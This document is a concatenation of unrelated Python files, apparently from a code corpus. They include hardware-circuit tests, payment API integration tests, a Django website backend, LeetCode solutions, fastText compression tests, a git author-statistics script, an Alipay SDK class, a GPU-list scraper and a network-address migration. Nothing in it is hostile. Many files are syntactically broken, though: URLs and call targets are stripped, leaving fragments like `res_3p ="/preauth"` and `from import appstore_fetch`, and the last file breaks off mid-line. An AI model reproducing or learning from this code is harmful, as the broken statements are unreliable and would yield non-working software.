""" Test the ability to ignore undriven inputs (useful for formal verification tools that use undriven inputs to mark wires that can take on any value) """ import pytest import magma as m from magma.testing import check_files_equal def test_ignore_unused_undriven_basic(): class Main(m.Circuit): _ignore_undriven_ = True io = m.IO(I=m.In(m.Bit), O=m.Out(m.Bit)) temp = ~io.I m.compile("build/test_ignore_unused_undriven_basic", Main, inline=True, drive_undriven=True, terminate_unused=True) assert check_files_equal(__file__, "build/test_ignore_unused_undriven_basic.v", "gold/test_ignore_unused_undriven_basic.v") def test_ignore_unused_undriven_hierarchy(): # For backwards compatability test with pytest.warns(DeprecationWarning): Bar = m.DeclareCircuit("Bar", "I", m.In(m.Bit)) class Foo(m.Circuit): io = m.IO(I0=m.In(m.Bit), I1=m.In(m.Bit), O0=m.Out(m.Bit), O1=m.Out(m.Bit)) io.O1 @= io.I0 Bar()(io.I1) class Main(m.Circuit): _ignore_undriven_ = True io = m.IO(I0=m.In(m.Bit), I1=m.In(m.Bit), O0=m.Out(m.Bit), O1=m.Out(m.Bit), O2=m.Out(m.Tuple[m.Bit, m.Bit]), O3=m.Out(m.Array[2, m.Bit])) foo = Foo() foo.I0 @= io.I0 io.O0 @= foo.O0 # partially undriven io.O2[0] @= 1 io.O3[0] @= 1 m.compile("build/test_ignore_unused_undriven_hierarchy", Main, inline=True, drive_undriven=True, terminate_unused=True) assert check_files_equal(__file__, "build/test_ignore_unused_undriven_hierarchy.v", "gold/test_ignore_unused_undriven_hierarchy.v") def test_ignore_undriven_coreir(): class Foo(m.Circuit): _ignore_undriven_ = True io = m.IO(I0=m.In(m.Bit), O0=m.Out(m.Bit), O1=m.Out(m.Bit)) io += m.ClockIO() io.O1 @= io.I0 class Main(m.Circuit): _ignore_undriven_ = True io = m.IO(I0=m.In(m.Bits[2]), I1=m.In(m.Bits[2]), O0=m.Out(m.Bit), O1=m.Out(m.Bit)) + m.ClockIO() foo = Foo() foo.I0 @= io.I0 == io.I1 io.O0 @= foo.O0 m.compile("build/test_ignore_undriven_coreir", Main, output="coreir", drive_undriven=True, terminate_unused=True) assert check_files_equal(__file__, "build/test_ignore_undriven_coreir.json", "gold/test_ignore_undriven_coreir.json")
<filename>payment/tests/integ/ import uuid import pytest import requests from fixtures import iam_auth # pylint: disable=import-error from helpers import get_parameter # pylint: disable=import-error,no-name-in-module @pytest.fixture(scope="module") def payment_3p_api_url(): return get_parameter("/ecommerce/{Environment}/payment-3p/api/url") @pytest.fixture(scope="module") def payment_api_url(): return get_parameter("/ecommerce/{Environment}/payment/api/url") def test_backend_validate(payment_3p_api_url, payment_api_url, iam_auth): """ Test /backend/validate """ card_number = "1234567890123456" total = 3000 # Create a payment token res_3p ="/preauth", json={ "cardNumber": card_number, "amount": total }) payment_token = res_3p.json()["paymentToken"] # Validate the token res = payment_api_url+"/backend/validate", auth=iam_auth(payment_api_url), json={ "paymentToken": payment_token, "total": total } ) assert res.status_code == 200 body = res.json() assert "ok" in body assert "message" not in body assert body["ok"] == True # Cleanup"/cancelPayment", json={ "paymentToken": payment_token }) def test_backend_validate_non_existent(payment_3p_api_url, payment_api_url, iam_auth): """ Test /backend/validate with a non-existent token """ payment_token = str(<KEY>()) total = 3000 # Validate the token res = payment_api_url+"/backend/validate", auth=iam_auth(payment_api_url), json={ "paymentToken": payment_token, "total": total } ) assert res.status_code == 200 body = res.json() assert "ok" in body assert "message" not in body assert body["ok"] == False def test_backend_validate_smaller_total(payment_3p_api_url, payment_api_url, iam_auth): """ Test /backend/validate with a smaller total """ card_number = "1234567890123456" total = 3000 # Create a payment token res_3p ="/preauth", json={ "cardNumber": card_number, "amount": total }) payment_token = res_3p.json()["paymentToken"] # Validate the token res = payment_api_url+"/backend/validate", auth=iam_auth(payment_api_url), json={ "paymentToken": payment_token, "total": total-1000 } ) assert res.status_code == 200 body = res.json() assert "ok" in body assert "message" not in body assert body["ok"] == True # Cleanup"/cancelPayment", json={ "paymentToken": payment_token }) def test_backend_validate_higher_total(payment_3p_api_url, payment_api_url, iam_auth): """ Test /backend/validate with a higher total """ card_number = "1234567890123456" total = 3000 # Create a payment token res_3p ="/preauth", json={ "cardNumber": card_number, "amount": total }) payment_token = res_3p.json()["paymentToken"] # Validate the token res = payment_api_url+"/backend/validate", auth=iam_auth(payment_api_url), json={ "paymentToken": payment_token, "total": total+2000 } ) assert res.status_code == 200 body = res.json() assert "ok" in body assert "message" not in body assert body["ok"] == False # Cleanup"/cancelPayment", json={ "paymentToken": payment_token }) def test_backend_validate_no_iam(payment_3p_api_url, payment_api_url): """ Test /backend/validate without IAM authorization """ card_number = "1234567890123456" total = 3000 # Create a payment token res_3p ="/preauth", json={ "cardNumber": card_number, "amount": total }) payment_token = res_3p.json()["paymentToken"] # Validate the token res = payment_api_url+"/backend/validate", json={ "paymentToken": payment_token, "total": total } ) assert res.status_code == 403 body = res.json() assert "ok" not in body assert "message" in body # Cleanup"/cancelPayment", json={ "paymentToken": payment_token }) def test_backend_validate_no_total(payment_3p_api_url, payment_api_url, iam_auth): """ Test /backend/validate without an total """ card_number = "1234567890123456" total = 3000 # Create a payment token res_3p ="/preauth", json={ "cardNumber": card_number, "amount": total }) payment_token = res_3p.json()["paymentToken"] # Validate the token res = payment_api_url+"/backend/validate", auth=iam_auth(payment_api_url), json={ "paymentToken": payment_token } ) assert res.status_code == 400 body = res.json() assert "ok" not in body assert "message" in body assert "total" in body["message"] # Cleanup"/cancelPayment", json={ "paymentToken": payment_token }) def test_backend_validate_no_payment_token(payment_3p_api_url, payment_api_url, iam_auth): """ Test /backend/validate without a payment token """ card_number = "1234567890123456" total = 3000 # Create a payment token res_3p ="/preauth", json={ "cardNumber": card_number, "amount": total }) payment_token = res_3p.json()["paymentToken"] # Validate the token res = payment_api_url+"/backend/validate", auth=iam_auth(payment_api_url), json={ "total": total } ) assert res.status_code == 400 body = res.json() assert "ok" not in body assert "message" in body assert "paymentToken" in body["message"] # Cleanup cancelPayment"/cancelPayment", json={ "paymentToken": payment_token })
<filename>thanks/ from functools import reduce from itertools import chain, takewhile import os import pkg_resources import re class MetaDataNotFound(Exception): pass def get_local_dist(package_name): working_set = dict( (dist.project_name, dist) for dist in pkg_resources.WorkingSet() ) return working_set[package_name] def get_dist_metadata(dist): metadata_path = get_local_dist_metadata_filepath(dist) with open(metadata_path) as fh: metadata = parse_metadata( return metadata def get_funding_data(metadata): return metadata.get('funding_url') def get_local_dist_metadata_filepath(dist): # Dist filename syntax # name ["-" version ["-py" pyver ["-" required_platform]]] "." ext # def valid_component(component): return component[1] # Stop taking filename components at the first missing/invalid component filename_component = takewhile(valid_component, ( ('', pkg_resources.to_filename(pkg_resources.safe_name(dist.project_name))), ('-', pkg_resources.to_filename(pkg_resources.safe_version(dist.version))), ('-py', dist.py_version), ('-', dist.platform), )) filename = ''.join(chain(*filename_component)) if isinstance(dist, pkg_resources.EggInfoDistribution): ext = 'egg-info' metadata_file = 'PKG-INFO' elif isinstance(dist, pkg_resources.DistInfoDistribution): ext = 'dist-info' metadata_file = 'METADATA' elif isinstance(dist, pkg_resources.Distribution): ext = os.path.join('egg', 'EGG-INFO') metadata_file = 'PKG-INFO' else: ext = None metadata_file = None filename = '{}.{}'.format(filename, ext) path = os.path.join(dist.location, filename, metadata_file) if ext: return path else: return None metadata_patterns = re.compile(r""" (\s*Author:\s+(?P<author>.*)\s*)? # Author (\s*Maintainer:\s+(?P<maintainer>.+)\s*)? # Maintainer (\s*Project-URL:\sFunding,\s+(?P<funding_url>.+)\s*)? # Funding URL """, re.VERBOSE) def get_line_metadata(line): return def filter_empty_metadata(metadata): return dict((k, v) for k, v in metadata.items() if v) def parse_metadata(metadata): metadata = ( filter_empty_metadata(get_line_metadata(line)) for line in metadata.splitlines() ) metadata = [m for m in metadata if m] metadata = reduce( lambda x, y: dict((k, v) for k, v in chain(x.items(), y.items())), metadata, {}, ) return metadata def get_local_metadata(package_name): try: dist = get_local_dist(package_name) metadata = get_dist_metadata(dist) except FileNotFoundError: # No metadata.json file locally raise MetaDataNotFound() return metadata def get_local_funding_metadata(package_name): try: metadata = get_local_metadata(package_name) funding_url = get_funding_data(metadata) except KeyError: # Package not available locally, # or there isn't a 'Funding' entry in the project_urls raise MetaDataNotFound() return funding_url
<gh_stars>1000+ # encoding: utf-8 # # Copyright 2016 Cluster Labs, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import logging from datetime import datetime from django.conf import settings from django.db import transaction from import appstore_fetch from import AppWebsiteScreenshot from import AppWebsitePage from backend.util import dnsutil from backend.util import text def check_domain_for_cname_record(domain): cname, error_message = dnsutil.get_cname_for_domain(domain) if error_message: return False, error_message if cname != '%s.' % settings.HOSTED_WEBSITE_CNAME: return False, 'The CNAME value is set but incorrect' return True, None def _short_description(long_description): if not long_description: return long_description return '%s...' % long_description[:180] def example_from_itunes_id(itunes_id, country): info = appstore_fetch.app_info_with_id(itunes_id, country) app_name, app_tagline = text.app_name_tagline( example_website = { 'id': 'example', 'appName': app_name, 'tagline': app_tagline, 'longDescription': info.description, 'shortDescription': _short_description(info.description), 'itunesId': info.itunes_id, 'images': { 'screenshots': {'iPhone': [{'url': screenshot} for screenshot in info.screenshots]}, 'icon': {'url': info.icon_512}, } } return example_website def get_fancy_cluster_example(): return { 'id': 'example', 'domain': '', 'template': '', 'appName': 'Cluster', 'tagline': 'Privately share special moments with friends and family', 'shortDescription': 'Cluster gives you a private space to share photos and memories with the people you choose, away from social media. Make your own groups and share pics, videos, comments, and chat!', 'longDescription': u'Cluster makes it possible to create private groups where you share moments through photos and videos with the people you care about. Create a group with family, a group of friends, coworkers, people from your home town, or anyone else!\r\n\r\nGreat for:\r\n\u2022 New Moms! Share photos of a new baby with close friends and family without spamming everyone on other social networks\r\n\u2022 College Students! Share memories with friends not appropriate for Facebook\r\n\u2022 Families! Keep in touch even if you\u2019re not in the same place.\r\n\r\nTons of people already trust Cluster. Here\u2019s why:\r\n\r\n\u2022 Private & secure: Only invited members of the group can see what you post.\r\n\u2022 An app for everyone: Access Cluster through gorgeous mobile apps and the web.\r\n\u2022 Relevant notifications: Know when people you invited post new things to the group.', 'keywords': 'private,group,social,network,space,family,album,photo,video,collaborative,shared,sharing,event,baby', 'itunesId': '596595032', 'playStoreId': '', 'supportLink': '', 'termsLink': '', 'privacyLink': '', 'primaryColor': '#0092F2', 'font': 'Lato', 'frameScreenshots': 'white', 'images': { 'logo': {'url':''}, 'background': {'url':''}, 'icon': {'url':''}, 'screenshots': {'iPhone': [{'url':''}, {'url':''}, {'url':''}, {'url':''}, {'url':''}, ], } }, } @transaction.atomic def update_website_screenshots(website, screenshot_images, platform): existing_screenshots = list(AppWebsiteScreenshot.objects.filter(, platform=platform).order_by('order')) screenshot_image_ids = set([ for i in screenshot_images]) screenshots_to_delete = [s for s in existing_screenshots if s.image_id not in screenshot_image_ids] for screenshot in screenshots_to_delete: screenshot.image.decrement_ref_count() screenshot.delete() existing_by_image_id = {i.image_id: i for i in existing_screenshots} for i, image in enumerate(screenshot_images): order = i + 1 if in existing_by_image_id: screenshot = existing_by_image_id[] if screenshot.order != order: screenshot.order = order else: image.increment_ref_count() screenshot = AppWebsiteScreenshot(website=website, image=image, platform=platform, order=order) @transaction.atomic def create_or_update_hosted_page(website, slug, body): hosted_page_titles = { 'terms' : 'Terms and Conditions', 'privacy' : 'Privacy Policy', 'support' : 'Support', } page = AppWebsitePage.objects.filter(website=website, slug=slug).first() if page and body: page.body = body elif not page and body: AppWebsitePage.objects.create(website=website, slug=slug, body=body, title=hosted_page_titles[slug]) elif page and not body: page.delete() @transaction.atomic def delete_website(website): screenshots = list(website.screenshots.all()) for screenshot in screenshots: screenshot.image.decrement_ref_count() screenshot.delete() if website.icon: website.icon.decrement_ref_count() website.icon = None if website.logo: website.logo.decrement_ref_count() website.logo = None if website.background: website.background.decrement_ref_count() website.background = None # TODO(Taylor): Mark as deleted instead of actually deleting potentially huge number of rows # AppWebsiteView.objects.filter( website.domain = None website.delete_time =
<reponame>rakhi2001/ecom7 __________________________________________________________________________________________________ sample 76 ms submission class Solution: def findSpecialInteger(self, arr: List[int]) -> int: for idx, num in enumerate(arr): if arr[idx] == arr[idx+len(arr)//4]: return num __________________________________________________________________________________________________ sample 80 ms submission class Solution: def findSpecialInteger(self, arr: List[int]) -> int: size = int((len(arr)) / 4) loose = max(1, size) for index in range(0, len(arr), loose): candidate = arr[index] left = bisect.bisect_left(arr, candidate, max(0, index - loose), min(len(arr), index + loose)) right = bisect.bisect_right(arr, candidate, max(0, index - loose), min(len(arr), index + loose)) if right - left > size: return arr[index] assert(False) __________________________________________________________________________________________________
import os import gensim import pytest import compress_fasttext from sklearn.pipeline import make_pipeline from sklearn.linear_model import LogisticRegression from compress_fasttext.feature_extraction import FastTextTransformer BIG_MODEL_FILE = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'data/test_data/ft_leipzig_ru_mini.bin') BASE_MODEL_URL = '' def cosine_sim(x, y): return sum(x * y) / (sum(x**2) * sum(y**2)) ** 0.5 @pytest.mark.parametrize('method, params', [ (compress_fasttext.quantize_ft, dict(qdim=32)), (compress_fasttext.prune_ft_freq, dict(pq=False, new_ngrams_size=10_000, new_vocab_size=10_000)), (compress_fasttext.prune_ft_freq, dict(pq=True, new_ngrams_size=10_000, new_vocab_size=10_000, qdim=16)), (compress_fasttext.prune_ft, dict(new_ngrams_size=10_000, new_vocab_size=10_000)), (compress_fasttext.svd_ft, dict(n_components=32)), ]) def test_prune_save_load(method, params): word1 = 'синий' word2 = 'белый' big_ft = gensim.models.fasttext.FastTextKeyedVectors.load(BIG_MODEL_FILE) vec0 = big_ft[word1] small_model = method(big_ft, **params) assert cosine_sim(vec0, small_model[word1]) > 0.75 out1 = small_model.most_similar(word1) assert word2 in {w for w, sim in out1}'tmp_small.bin') small_model2 = compress_fasttext.models.CompressedFastTextKeyedVectors.load('tmp_small.bin') assert cosine_sim(vec0, small_model2[word1]) > 0.75 out2 = small_model2.most_similar(word1) assert word2 in {w for w, sim in out2} assert out1[0][1] == pytest.approx(out2[0][1]) @pytest.mark.parametrize('word1, word2, model_name', [ ('белый', 'черный', 'gensim-4-draft/geowac_tokens_sg_300_5_2020-100K-20K-100.bin'), ('white', 'black', 'gensim-4-draft/ft_cc.en.300_freqprune_50K_5K_pq_100.bin'), ('white', 'black', 'v0.0.4/cc.en.300.compressed.bin'), ]) def test_loading_existing_models(word1, word2, model_name): ft = compress_fasttext.models.CompressedFastTextKeyedVectors.load(BASE_MODEL_URL + model_name) out = ft.most_similar(word1) assert word2 in {w for w, sim in out} def test_sklearn_wrapper(): small_model = compress_fasttext.models.CompressedFastTextKeyedVectors.load( '' ) classifier = make_pipeline( FastTextTransformer(model=small_model), LogisticRegression() ).fit( ['banana', 'soup', 'burger', 'car', 'tree', 'city'], [1, 1, 1, 0, 0, 0] ) assert (classifier.predict(['jet', 'train', 'cake', 'apple']) == [0, 0, 1, 1]).all()
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright (c) 2017, <NAME> # All rights reserved. # # The file is part of the xpcc library and is released under the 3-clause BSD # license. See the file `LICENSE` for the full license governing this code. # ----------------------------------------------------------------------------- import subprocess, locale from collections import defaultdict import argparse author_handles = { "<NAME>": "AndreGilerson", "<NAME>": "Sh4rK", "<NAME>": None, "<NAME>": "cajt", "<NAME>": "chrism333", "<NAME>": None, "<NAME>": "chris-durand", "<NAME>": "daniel-k", "<NAME>": "dhebbeker", "<NAME>": "dergraaf", "<NAME>": "georgi-g", "<NAME>": "RzwoDzwo", "<NAME>": None, "<NAME>": "ekiwi", "<NAME>": "lmoesch", "<NAME>": "Maju-Ketchup", "<NAME>": "Scabber", "<NAME>": "thundernail", "<NAME>": "mhthies", "<NAME>": "genbattle", "<NAME>": None, "<NAME>": "salkinium", "<NAME>": "rleh", "<NAME>": "strongly-typed", "<NAME>": "7Kronos", "<NAME>": "TheTh0r", "<NAME>": "tomchy", "<NAME>": "acristoffers", } def get_author_log(since = None, until = None, handles = True, count = False): sl_command = "git shortlog -sn" if since is not None: sl_command += " --since=\"{}\"".format(since) if until is not None: sl_command += " --until=\"{}\"".format(until) # get the shortlog summary output = subprocess.Popen(sl_command, shell=True, stdout=subprocess.PIPE)\ # parse the shortlog shortlog = defaultdict(int) for line in output.splitlines(): commits, author = line.split("\t") shortlog[author] += int(commits) # convert to list of tuples for sorting commit_tuples = [(c, a) for a, c in shortlog.items()] if count: # sort by number of commits, then alphabetically by author commit_tuples.sort(key=lambda a: (-a[0], a[1])) else: # sort by name commit_tuples.sort(key=lambda a: a[1]) output = [] for (commits, author) in commit_tuples: out = author if handles and author in author_handles and author_handles[author] is not None: out += u" (@{})".format(author_handles[author]) if count: out = u"{:4} {}".format(commits, out) output.append(out) return output if __name__ == "__main__": parser = argparse.ArgumentParser(description="Author statistics of xpcc.") parser.add_argument("--handles", dest="with_handles", action="store_true", help="adds the GitHub handle to the author if known") parser.add_argument("--count", dest="with_count", action="store_true", help="adds and sorts authors by commit count") parser.add_argument("--shoutout", dest="with_shoutout", action="store_true", help="annotates first time contributers") parser.add_argument("--since", dest="since", help="evaluates the git history from this date until present") args = parser.parse_args() since_date = args.since if args.since else None log_authors = get_author_log(since=since_date, handles=args.with_handles, count=args.with_count) new_authors = [] if args.with_shoutout and since_date: previous_authors = get_author_log(until=since_date, handles=False, count=False) new_authors = get_author_log(since=since_date, handles=False, count=False) new_authors = [a for a in new_authors if a not in previous_authors] authors = [] for author in log_authors: if any(a in author for a in new_authors): author += u" 🎉🎊" authors.append(author) print("\n".join(authors))
<gh_stars>100-1000 # tests/ # Automatically generated by tools/ (24-Sep-2021 15:18:02 UTC) def test_provider_import(): import terrascript.provider.hashicorp.hashicups def test_resource_import(): from terrascript.resource.hashicorp.hashicups import hashicups_order def test_datasource_import(): from import hashicups_coffees from import hashicups_ingredients from import hashicups_order # TODO: Shortcut imports without namespace for official and supported providers. # TODO: This has to be moved into a required_providers block. # def test_version_source(): # # import terrascript.provider.hashicorp.hashicups # # t = terrascript.provider.hashicorp.hashicups.hashicups() # s = str(t) # # assert '' in s # assert '0.3.1' in s
import pandas as pd from src.config import Config config = Config() dfs = [] for cloth in ['blouse', 'skirt', 'outwear', 'dress', 'trousers']: df = pd.read_csv(config.proj_path + 'kp_predictions/' + cloth + '.csv') dfs.append(df) res_df = pd.concat(dfs) res_df.to_csv(config.proj_path +'kp_predictions/result.csv', index=False)
from .base import BaseHandler, DefaultHandler # noqa: F401 from .cast import caster as callback_caster # noqa: F401
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.response.AlipayResponse import AlipayResponse from alipay.aop.api.domain.PaymentSuccessPagePlanInfo import PaymentSuccessPagePlanInfo class AlipayOpenMiniPlanOperateBatchqueryResponse(AlipayResponse): def __init__(self): super(AlipayOpenMiniPlanOperateBatchqueryResponse, self).__init__() self._page_data = None self._page_num = None self._page_size = None self._total_number = None @property def page_data(self): return self._page_data @page_data.setter def page_data(self, value): if isinstance(value, list): self._page_data = list() for i in value: if isinstance(i, PaymentSuccessPagePlanInfo): self._page_data.append(i) else: self._page_data.append(PaymentSuccessPagePlanInfo.from_alipay_dict(i)) @property def page_num(self): return self._page_num @page_num.setter def page_num(self, value): self._page_num = value @property def page_size(self): return self._page_size @page_size.setter def page_size(self, value): self._page_size = value @property def total_number(self): return self._total_number @total_number.setter def total_number(self, value): self._total_number = value def parse_response_content(self, response_content): response = super(AlipayOpenMiniPlanOperateBatchqueryResponse, self).parse_response_content(response_content) if 'page_data' in response: self.page_data = response['page_data'] if 'page_num' in response: self.page_num = response['page_num'] if 'page_size' in response: self.page_size = response['page_size'] if 'total_number' in response: self.total_number = response['total_number']
<reponame>pierky/exabgp # encoding: utf-8 """ Created by <NAME> on 2009-09-06. Copyright (c) 2009-2017 Exa Networks. All rights reserved. License: 3-clause BSD. (See the COPYRIGHT file) """ def od(value): def spaced(value): even = None for v in value: if even is False: yield ' ' yield '%02X' % v even = not even return ''.join(spaced(value))
<gh_stars>100-1000 from django.conf import settings import time import requests import hashlib import traceback import json class WorkFlowAPiRequest(object): def __init__(self,token=settings.WORKFLOW_TOKEN, appname=settings.WORKFLOW_APP, username='admin', workflowurl=settings.WORKFLOW_URL): self.token = token self.appname = appname self.username = username self.workflowurl = workflowurl def getrequestheader(self): timestamp = str(time.time())[:10] ori_str = timestamp + self.token signature = hashlib.md5(ori_str.encode(encoding='utf-8')).hexdigest() headers = dict(signature=signature, timestamp=timestamp, appname=self.appname, username=self.username) return headers def getdata(self,parameters=dict(),method='get',url='/api/v1.0/workflows/',timeout=300,data=dict()): if method not in ['get','post','put','delete','patch']: return False,'method must be one of get post put delete or patch' if not isinstance(parameters,dict): return False,'Parameters must be dict' headers = self.getrequestheader() try: r = getattr(requests,method)('{0}{1}'.format(self.workflowurl,url), headers=headers, params=parameters,timeout=timeout,data=json.dumps(data)) result = r.json() return True,result except: return False,traceback.format_exc() # ins = WorkFlowAPiRequest() # print (ins.getdata(parameters=dict(username='admin', per_page=20, name=''),method='get',url='/api/v1.0/workflows'))
<filename>patchlion/0000/<gh_stars>1000+ # -*- coding: utf-8 -*- __author__ = 'PatchLion' from PIL import Image, ImageDraw,ImageFont def drawNumberOnIcon(imgpath, number): img = if (None == img): print('打开图片失败') return img = img.resize((160, 160)) print(imgpath, "->", img.format, img.size, img.mode) draw = ImageDraw.Draw(img) img_size = img.size font = ImageFont.truetype("Varela-Regular.otf", size=int(img_size[1]/4)) text_size = font.getsize(str(number)) draw.text((img_size[0]-text_size[0], 0), str(number), font=font, fill=(255, 0, 0))'icon_withnumber.jpg') print('生成图片成功') drawNumberOnIcon("icon.jpg", 21)
<gh_stars>100-1000 import argparse import os from collections import Counter from sklearn.metrics import confusion_matrix, classification_report def read_labels(filename): labels = [] with open(filename) as f: for line in f: line = line.strip() if len(line) == 0: continue _, label = line.split('\t') labels.append(label) return labels def compare_labels(true_labels, pred_labels): true_set = set(true_labels) pred_set = set(pred_labels) print('\n▶ Label usage:') print(' ~ Used in both: {}'.format(true_set | pred_set)) print(' ~ Extra in true: {}'.format(true_set - pred_set)) print(' ~ Extra in pred: {}'.format(pred_set - true_set)) print('\n▶ Raw counts:') true_counts = Counter(true_labels) pred_counts = Counter(pred_labels) sorted_labels = sorted(true_counts, key=true_counts.get, reverse=True) + sorted(pred_set - true_set) print('\tTrue\tPred\tDiff') for label in sorted_labels: diff = pred_counts[label] - true_counts[label] direction = '+' if diff > 0 else '-' if diff < 0 else ' ' if diff < 0: diff = -diff print('{}\t{}\t{}\t{}{:4}'.format(label, true_counts[label], pred_counts[label], direction, diff)) print('\n▶ Confusion matrix:') sorted_labels = sorted(true_set | pred_set) padded_labels = [lab + ' ' * (4 - len(lab)) if len(lab) < 8 else lab for lab in sorted_labels] cm = confusion_matrix(true_labels, pred_labels, labels=sorted_labels) print(' \tpredicted:') print(' \t' + '\t'.join(padded_labels)) for i in range(len(cm)): prefix = 'true: ' if i == 0 else ' ' * 6 prefix += padded_labels[i] print(prefix + '\t' + '\t'.join([str(n) for n in cm[i]])) print('\n▶ Classification report:') print(classification_report(true_labels, pred_labels, digits=3)) print('\n▶ Classification report w/o O label:') print(classification_report(true_labels, pred_labels, labels=list(true_set - {'O'}), digits=3)) def main(): parser = argparse.ArgumentParser() parser.add_argument("--path", default=None, type=str, required=True, help="Base path") parser.add_argument("--name", default=None, type=str, required=True, help="File name [train,dev,test]") args = parser.parse_args() true_path = os.path.join(args.path, + '.true.tsv') pred_path = os.path.join(args.path, + '.pred.tsv') true_labels = read_labels(true_path) print('▶ Read true labels from {}'.format(true_path)) pred_labels = read_labels(pred_path) print('▶ Read pred labels from {}'.format(pred_path)) if len(true_labels) != len(pred_labels): print('True and pred file do not have the same amount of labels ({} and {})'.format( len(true_labels), len(pred_labels))) exit(-1) print('\nFull label comparison:') compare_labels(true_labels, pred_labels) if set([lab[0] for lab in true_labels]) == {'B', 'I', 'O'}: true_label_cats = [lab if lab == 'O' else lab[2:] for lab in true_labels] pred_label_cats = [lab if lab == 'O' else lab[2:] for lab in pred_labels] print('\nBIO category comparison:') compare_labels(true_label_cats, pred_label_cats) if 'O' in true_labels: true_label_binary = ['O' if lab == 'O' else 'X' for lab in true_labels] pred_label_binary = ['O' if lab == 'O' else 'X' for lab in pred_labels] print('\nBinary comparison:') compare_labels(true_label_binary, pred_label_binary) if __name__ == '__main__': main()
<gh_stars>100-1000 # Copyright 2021 Sony Corporation. # Copyright 2021 Sony Group Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import urllib.request as request from html.parser import HTMLParser import re from mako.template import Template import os from gpu_info import incompatible_arcs, gpu_compute_capability_to_arc basedir = os.path.dirname(os.path.abspath(__file__)) r = request.urlopen('') class GetGpuListFromNvidiaSite(HTMLParser): def __init__(self): super().__init__() = False self.last_value = None self.last_data = '' self.gpu_data = {} def handle_starttag(self, tag, attrs): if tag == 'td': = True def handle_endtag(self, tag): if tag == 'td': if m = re.match(r'((\d+)\.(\d+))', self.last_data.strip()) if m: cap = cap_major = int( cap_minor = int( arch = gpu_compute_capability_to_arc.get(cap_major) if arch is None: arch = gpu_compute_capability_to_arc.get( (cap_major, cap_minor)) if arch is None: print(f'Error: unknown capability [{cap}]') arch = '' name = self.last_value.lower().replace( 'nvidia ', '').replace('tesla ', '') # remove prefix self.gpu_data[name] = (arch, cap) self.last_value = self.last_data.strip() self.last_data = '' = False def handle_data(self, data): if self.last_data += data parser = GetGpuListFromNvidiaSite() parser.feed( gpus_info = parser.gpu_data incompatible_gpus = {} for k in incompatible_arcs: if not incompatible_gpus.get(k): incompatible_gpus[k] = [] iarc = incompatible_arcs[k] for gpu_name in gpus_info.keys(): if gpus_info[gpu_name][0] in iarc: incompatible_gpus[k].append(gpu_name) fname = os.path.join(basedir, 'skel', '') tmpl = Template(filename=fname) lines = tmpl.render(args=incompatible_gpus) with open("./python/src/nnabla_ext/cuda/", 'w') as f: for l in lines: f.write(l)
<reponame>DoNnMyTh/ralph<gh_stars>1000+ # -*- coding: utf-8 -*- from __future__ import unicode_literals import ipaddress from itertools import chain from django.db import migrations, models IPADDRESS_STATUS_RESERVED = 2 def _reserve_margin_addresses(network, bottom_count, top_count, IPAddress): ips = [] ips_query = IPAddress.objects.filter( models.Q( number__gte=network.min_ip + 1, number__lte=network.min_ip + bottom_count + 1 ) | models.Q( number__gte=network.max_ip - top_count, number__lte=network.max_ip ) ) existing_ips = set(ips_query.values_list('number', flat=True)) to_create = set(chain.from_iterable([ range(int(network.min_ip + 1), int(network.min_ip + bottom_count + 1)), # noqa range(int(network.max_ip - top_count), int(network.max_ip)) ])) to_create = to_create - existing_ips for ip_as_int in to_create: ips.append(IPAddress( address=str(ipaddress.ip_address(ip_as_int)), number=ip_as_int, network=network, status=IPADDRESS_STATUS_RESERVED )) print('Creating {} ips for {}'.format(len(ips), network)) IPAddress.objects.bulk_create(ips) ips_query.update(status=IPADDRESS_STATUS_RESERVED) def create_reserved_ips(apps, schema_editor): IPAddress = apps.get_model('networks', 'IPAddress') Network = apps.get_model('networks', 'Network') for network in Network.objects.all(): _reserve_margin_addresses( network, network.reserved_from_beginning, network.reserved_from_end, IPAddress ) def remove_reserved_ips(apps, schema_editor): IPAddress = apps.get_model('networks', 'IPAddress') ips = IPAddress.objects.filter( models.Q(ethernet__isnull=True) | ( models.Q(ethernet__base_object__isnull=True) & models.Q(ethernet__mac__isnull=False) ), status=IPADDRESS_STATUS_RESERVED, gateway_network__isnull=True, ) print('Removing {} reserved IPs'.format(ips.count())) ips.delete() class Migration(migrations.Migration): dependencies = [ ('networks', '0007_auto_20160804_1409'), ] operations = [ migrations.AddField( model_name='network', name='reserved_from_beginning', field=models.PositiveIntegerField(help_text='Number of addresses to be omitted in DHCP automatic assignmentcounted from the first IP in range (excluding network address)', default=10), ), migrations.AddField( model_name='network', name='reserved_from_end', field=models.PositiveIntegerField(help_text='Number of addresses to be omitted in DHCP automatic assignmentcounted from the last IP in range (excluding broadcast address)', default=0), ), migrations.RunPython( remove_reserved_ips, reverse_code=create_reserved_ips ), ]
#!/usr/bin/env python debug = True # enable trace def trace(x): global debug if debug: print(x) trace("loading...") from itertools import combinations, combinations_with_replacement from glob import glob from math import * import operator from os.path import basename import matplotlib.pyplot as plt import numpy as np import pandas as pd import sklearn.linear_model import sklearn.feature_selection import datetime def prec_from_pathname(path): if '2k' in path: return 0.002 elif '5k' in path: return 0.005 else: raise AssertionError('Unknown field strengh: %s' % path) # ['x', 'y', 'z', 'xx', 'xy', 'xz', 'yy', ...] def combinatrial_vars(vars_str='xyz', length=3): term_list = [] for l in range(length): term_list.extend([''.join(v) for v in combinations_with_replacement(list(vars_str), 1 + l)]) return term_list # product :: a#* => [a] -> a def product(xs): return reduce(operator.mul, xs, 1) # foldl in Haskell # (XYZ, "xx") -> XX def term(dataframe, vars_str): return product(map(lambda x: dataframe[x], list(vars_str))) # (f(X), Y) -> (max deviation, max%, avg dev, avg%) def deviation_stat(fX, Y, prec=0.005): dev = np.abs(fX - Y) (max_dev, avg_dev) = (dev.max(axis=0), dev.mean(axis=0)) (max_pct, avg_pct) = (max_dev / prec * 100, avg_dev / prec * 